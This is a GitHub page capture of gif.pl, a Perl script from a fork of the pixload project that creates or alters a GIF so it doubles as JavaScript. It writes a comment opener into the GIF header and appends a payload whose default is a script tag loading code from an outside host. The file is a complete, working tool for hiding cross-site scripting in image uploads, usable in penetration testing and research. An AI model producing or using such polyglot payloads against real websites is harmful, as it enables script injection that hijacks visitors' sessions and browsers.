forked from sighook/pixload
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathgif.pl
executable file
·100 lines (74 loc) · 2.13 KB
/
gif.pl
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
#!/usr/bin/perl
#
# GIF Payload Creator/Injector
#
# coded by chinarulezzz, [email protected]
# credits to marcoramilli.blogspot.com
#
# See LICENSE file for copyright and license details.
#
use strict;
use warnings;
use feature 'say';
use POSIX;
use Getopt::Long;
use GD;
sub usage;
sub create_gif;
sub inject_payload;
# Command line options
GetOptions(
'help!' => \my $help,
'payload=s' => \my $payload,
'output=s' => \my $outfile,
);
usage(0) if $help;
usage(1) unless $outfile;
$payload //= '<script src=//nji.xyz></script>';
say <<EOF;
[>| GIF Payload Creator/Injector |<]
https://github.com/chinarulezzz/pixload
EOF
create_gif unless -f $outfile;
inject_payload;
say `file $outfile` if -f '/usr/bin/file';
say `hexdump -C $outfile` if -f '/usr/bin/hexdump';
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Subroutines #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
sub usage {
say <<"EOF";
Usage: $0 [-payload 'STRING'] -output payload.gif
If the output file exists, then the payload will be injected into the
existing file. Else the new one will be generated.
EOF
exit +shift;
}
sub create_gif {
say "[>] Generating output file";
my $img = GD::Image->new(
32,
32,
1, # Set 1 to TrueColor (24 bits of color data), default is 8-bit palette
);
my $color = $img->colorAllocate(0, 0, 0);
$img->setPixel(0, 0, $color);
sysopen my $fh, $outfile, O_CREAT|O_WRONLY;
syswrite $fh, $img->gif;
close $fh;
say "[✔] File saved to: $outfile\n";
}
sub inject_payload {
say "[>] Injecting payload into $outfile";
sysopen my $fh, $outfile, O_WRONLY;
sysseek $fh, 6, SEEK_SET;
syswrite $fh, "\x2f\x2a";
sysseek $fh, 0, SEEK_END;
syswrite $fh, "\x2a\x2f\x3d\x31\x3b";
syswrite $fh, $payload;
syswrite $fh, "\x3b";
close $fh;
say "[✔] Payload was injected successfully\n";
}
# vim:sw=4:ts=4:sts=4:et:cc=80
# End of file